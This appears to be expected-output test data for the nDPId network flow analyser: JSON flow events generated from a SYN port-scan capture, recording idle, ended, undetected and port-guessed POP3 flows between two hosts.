-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275059345,"flow_last_seen":1278275059407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36061,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4224,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 